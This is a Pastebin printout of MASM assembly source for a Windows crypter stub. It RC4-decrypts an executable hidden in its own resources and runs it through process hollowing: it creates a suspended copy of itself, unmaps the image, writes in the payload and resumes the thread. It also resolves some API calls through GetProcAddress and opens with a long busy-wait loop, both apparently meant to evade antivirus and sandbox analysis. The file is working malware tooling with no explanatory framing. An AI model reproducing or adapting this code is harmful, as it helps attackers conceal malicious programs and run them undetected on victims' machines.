Pastebin.com - Printed Paste ID: https://pastebin.com/

1. ;Compiled with MASM
2. .386
3. .model flat, stdcall
4. option casemap:none
5. include \masm32\include\windows.inc
6. include \masm32\include\kernel32.inc
7. include \masm32\include\shell32.inc
8. include \masm32\include\ntdll.inc
9. include 123.inc
10. includelib \masm32\lib\kernel32.lib
11. includelib \masm32\lib\shell32.lib
12. includelib \masm32\lib\ntdll.lib
13. .code
14. Rc4_setkey proc Pass:DWORD, LenPass:DWORD
15. pushad
16. mov eax, 0FFFEFDFCh
17. mov ecx, 256/4
18. Init_rc4keytable:
19. mov dword ptr [rc4keytable+4*ecx-4], eax
20. sub eax, 04040404h
21. dec ecx
22. jnz Init_rc4keytable
23.  
24. xor eax, eax
25. mov edi, Pass
26.  
27. Key_return:
28. xor ebx, ebx
29. mov esi ,LenPass
30. jmp New_key
31.  
32. Key_loop:
33. inc bl
34. dec esi
35. jz Key_return
36.  
37. New_key:
38. mov dl, byte ptr [rc4keytable+ecx]
39. add al, byte ptr [edi+ebx]
40. add al, dl
41. mov dh, byte ptr [rc4keytable+eax]
42. mov byte ptr [rc4keytable+ecx], dh
43. mov byte ptr [rc4keytable+eax], dl
44. inc cl
45. jnz Key_loop
46.  
47. popad
48. ret
49. Rc4_setkey endp
50.  
51. Rc4_crypt proc iData:DWORD, LenData:DWORD
52. pushad
53. mov edi, LenData
54. mov esi, iData
55. test edi, edi
56. jz Rc4_enc_exit
57.  
58. xor eax, eax
59. xor edx, edx
60. xor ecx, ecx
61. xor ebx, ebx
62.  
63. Rc4_enc_loop:
64. inc bl
65. mov dl, byte ptr [rc4keytable+ebx]
66. add al, dl
67. mov cl, byte ptr [rc4keytable+eax]
68. mov byte ptr [rc4keytable+ebx], cl
69. mov byte ptr [rc4keytable+eax], dl
70. add cl, dl
71. mov cl, byte ptr [rc4keytable+ecx]
72. xor byte ptr [esi], cl
73. inc esi
74. dec edi
75. jnz Rc4_enc_loop
76.  
77. xor eax, eax
78. mov edi, offset rc4keytable
79. mov ecx, 256/4
80. cld
81. rep stosd
82.  
83. Rc4_enc_exit:
84. popad
85. ret
86. Rc4_crypt endp
87.  
88. getadress proc module:DWORD,funcion:DWORD
89. LOCAL fh:HMODULE
90. push module
91. call LoadLibrary
92. mov fh,eax
93. push funcion
94. push fh
95. call GetProcAddress
96. mov ebx,eax
97. ;invoke FreeLibrary,fh
98. ret
99. getadress endp
100. ExtractFile proc
101. local hResource:dword
102. LOCAL sinfo: STARTUPINFO
103. LOCAL pinfo: PROCESS_INFORMATION
104. LOCAL base: dword
105. LOCAL sec: ptr IMAGE_SECTION_HEADER
106. LOCAL cnt: CONTEXT
107.  
108.  
109.  
110. push 256
111. push offset mPath
112. push 0
113. call GetModuleFileName
114.  
115. push 0
116. call GetModuleHandle
117.  
118.  
119. mov hInstance, eax
120.  
121. invoke getadress,addr find1,addr find2
122.  
123. mov temp,ebx
124. push RT_RCDATA
125. push 1212
126. push hInstance
127. call temp
128.  
129. .if eax == 0
130. invoke ExitProcess,0
131. .else
132. mov hResource, eax
133.  
134. ;invoke SizeofResource, hInstance, hResource
135.  
136. push hResource
137. push hInstance
138. call SizeofResource
139. .if eax != 0
140.  
141.  
142. mov hResourceSize, eax
143.  
144.  
145.  
146. ;invoke LoadResource, hInstance, hResource
147.  
148. push hResource
149. push hInstance
150. call LoadResource
151.  
152. ; invoke getadress,find1,find8
153. ;mov temp,ebx
154. ;push hResource
155. ;push hInstance
156. ;call temp
157.  
158.  
159.  
160. .if eax != 0
161. invoke LockResource, eax
162. mov ResInf , eax
163. invoke lstrlen,addr password
164. invoke Rc4_setkey,addr password,eax
165. invoke Rc4_crypt,ResInf,hResourceSize
166. invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
167.  
168.  
169. ;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
170.  
171. invoke getadress,find1,find4
172. mov temp,eax
173. lea edx,pinfo
174. push edx
175. lea edx,sinfo
176. push edx
177. push 0
178. push 0
179. push CREATE_SUSPENDED
180. push 0
181. push 0
182. push 0
183. push 0
184. push offset mPath
185. call CreateProcess
186.  
187.  
188. invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
189. mov cnt.ContextFlags, CONTEXT_INTEGER
190.  
191. invoke GetThreadContext, pinfo.hThread, addr cnt
192.  
193.  
194. ; invoke GetModuleHandle, 0
195. push 0
196. call GetModuleHandle
197.  
198.  
199.  
200.  
201. ; invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
202.  
203. push eax
204. push pinfo.hProcess
205. call ZwUnmapViewOfSection
206.  
207.  
208. mov edi, ResInf
209. add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
210. assume edi: ptr IMAGE_NT_HEADERS
211.  
212. invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
213.  
214. mov base, eax
215. ;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
216.  
217. invoke getadress,addr find1,addr find3
218. mov temp,eax
219. push 0
220. push [edi].OptionalHeader.SizeOfHeaders
221. push ResInf
222. push base
223. push pinfo.hProcess
224. call temp
225.  
226. lea eax, [edi].OptionalHeader
227. mov sec, eax
228. movzx eax, [edi].FileHeader.SizeOfOptionalHeader
229. add sec, eax
230. xor eax, eax
231. xor esi, esi
232. xor ecx, ecx
233. .while ( si < [edi].FileHeader.NumberOfSections )
234. imul eax, esi, sizeof IMAGE_SECTION_HEADER
235. add eax, sec
236. mov ebx, base
237. add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
238. mov edx, ResInf
239. add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
240.  
241.  
242. invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
243.  
244. inc esi
245. .endw
246. mov eax, base
247. add eax, [edi].OptionalHeader.AddressOfEntryPoint
248. mov cnt.regEax, eax
249. invoke SetThreadContext, pinfo.hThread, addr cnt
250. invoke ResumeThread, pinfo.hThread
251. ret
252. .endif
253. .endif
254. .endif
255. ExtractFile endp
256. _entrypoint:
257. mov loop_stopper,500000000
258. loop_start:
259. mov eax,0
260. push eax
261. pop eax
262. cmp loop_stopper, 0
263. dec loop_stopper
264. jg loop_start
265. invoke ExtractFile
266. invoke ExitProcess, 0
267. end _entrypoint